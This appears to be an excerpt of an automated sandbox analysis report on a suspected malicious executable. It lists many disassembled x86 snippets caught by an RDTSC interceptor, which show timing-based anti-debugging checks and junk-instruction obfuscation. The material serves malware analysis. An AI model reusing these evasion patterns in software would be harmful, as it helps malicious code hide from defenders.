Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78062 second address: B78067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78067 second address: B7807A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB452Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7807A second address: B780D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F08C0C9195Ah 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F08C0C91958h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c sub ecx, 137DA912h 0x00000032 call 00007F08C0C91959h 0x00000037 js 00007F08C0C91964h 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B780D8 second address: B780F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007F08C0CB4526h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B780F1 second address: B780F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B780F5 second address: B780FF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B780FF second address: B7811B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C9195Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7811B second address: B78120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7835A second address: B7835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78437 second address: B7844A instructions: 0x00000000 rdtsc 0x00000002 js 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F08C0CB4526h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78586 second address: B7858A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7858A second address: B7858E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7858E second address: B785E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F08C0C91958h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edx, 32F8C6D3h 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F08C0C91958h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D33A5h], esi 0x00000049 nop 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B785E7 second address: B785EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78A8D second address: B78A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78A91 second address: B78A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78A97 second address: B78A9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78D70 second address: B78DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F08C0CB4528h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 jnp 00007F08C0CB452Ch 0x0000002b ja 00007F08C0CB453Dh 0x00000031 lea eax, dword ptr [ebp+1247767Ah] 0x00000037 mov edx, dword ptr [ebp+122D2F41h] 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 push ecx 0x00000041 jmp 00007F08C0CB4538h 0x00000046 pop ecx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78DFF second address: B78E11 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F08C0C91964h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78E11 second address: B78E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78E17 second address: B55B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007F08C0C91958h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 jmp 00007F08C0C91962h 0x00000025 call dword ptr [ebp+12443A95h] 0x0000002b pushad 0x0000002c pushad 0x0000002d js 00007F08C0C91956h 0x00000033 push esi 0x00000034 pop esi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B334F7 second address: B334FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA74F6 second address: BA7508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA76A3 second address: BA76A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7AE8 second address: BA7B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F08C0C91962h 0x0000000b jmp 00007F08C0C91962h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7DE7 second address: BA7E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0CB4538h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F32 second address: BA7F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F36 second address: BA7F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F08C0CB4528h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F44 second address: BA7F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Ah 0x00000007 jl 00007F08C0C9195Ch 0x0000000d je 00007F08C0C91956h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F63 second address: BA7F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F69 second address: BA7F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F08C0C91956h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F08C0C91963h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F8A second address: BA7F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F8F second address: BA7F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F08C0C91956h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC9A2 second address: BAC9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F08C0CB4536h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACB2E second address: BACB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACDB7 second address: BACDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jmp 00007F08C0CB4531h 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08C0CB452Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACF36 second address: BACF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ecx 0x00000007 push edx 0x00000008 jng 00007F08C0C91956h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD0D6 second address: BAD0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F08C0CB4526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD0E2 second address: BAD0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F08C0C91960h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD0F9 second address: BAD103 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0CB4526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD103 second address: BAD11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0C9195Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD11B second address: BAD121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2BE second address: BAD2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F08C0C91956h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2D4 second address: BAD2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2D8 second address: BAD2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0C91961h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2EF second address: BAD2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2F9 second address: BAD31E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F08C0C91971h 0x0000000e jmp 00007F08C0C91965h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD4A5 second address: BAD4AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD4AF second address: BAD4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD4B3 second address: BAD4BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD4BD second address: BAD4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F08C0C91956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD770 second address: BAD774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD774 second address: BAD78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F08C0C91960h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD78D second address: BAD793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD793 second address: BAD7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C91965h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD913 second address: BAD929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F08C0CB452Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD929 second address: BAD952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F08C0C91969h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jne 00007F08C0C91962h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD952 second address: BAD958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5FF7 second address: BB600D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F08C0C9195Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB600D second address: BB6013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB6013 second address: BB6025 instructions: 0x00000000 rdtsc 0x00000002 js 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F08C0C9195Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4E33 second address: BB4E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4E3B second address: BB4E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4E40 second address: BB4E59 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 jnp 00007F08C0CB452Ch 0x0000000c jo 00007F08C0CB4526h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4E59 second address: BB4E6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB537F second address: BB5389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5389 second address: BB538F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB538F second address: BB53CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F08C0CB4539h 0x0000000c jmp 00007F08C0CB4536h 0x00000011 jnl 00007F08C0CB4526h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB53CC second address: BB53F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F08C0C91972h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4B38 second address: BB4B42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F08C0CB4526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5A73 second address: BB5A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5A77 second address: BB5A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5A7D second address: BB5ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F08C0C91967h 0x0000000c jmp 00007F08C0C91960h 0x00000011 jmp 00007F08C0C91963h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c jne 00007F08C0C91956h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8C3B second address: BB8C6D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007F08C0CB452Ah 0x00000012 pushad 0x00000013 jp 00007F08C0CB4526h 0x00000019 push edx 0x0000001a pop edx 0x0000001b jc 00007F08C0CB4526h 0x00000021 popad 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 push edi 0x00000026 pop edi 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC0DB second address: BBC0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC0DF second address: BBC120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4538h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F08C0CB452Eh 0x00000011 jmp 00007F08C0CB452Ch 0x00000016 jns 00007F08C0CB4526h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF15E second address: BBF162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF162 second address: BBF177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F08C0CB4526h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF177 second address: BBF17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF17B second address: BBF195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0CB4534h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEAE4 second address: BBEAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEAE8 second address: BBEAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEC80 second address: BBEC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE24 second address: BBEE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE2E second address: BBEE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE32 second address: BBEE38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE38 second address: BBEE44 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE44 second address: BBEE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE48 second address: BBEE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F08C0C91976h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F08C0C91956h 0x00000019 js 00007F08C0C91956h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE72 second address: BBEE80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F08C0CB452Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3172 second address: BC3176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3176 second address: BC317A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
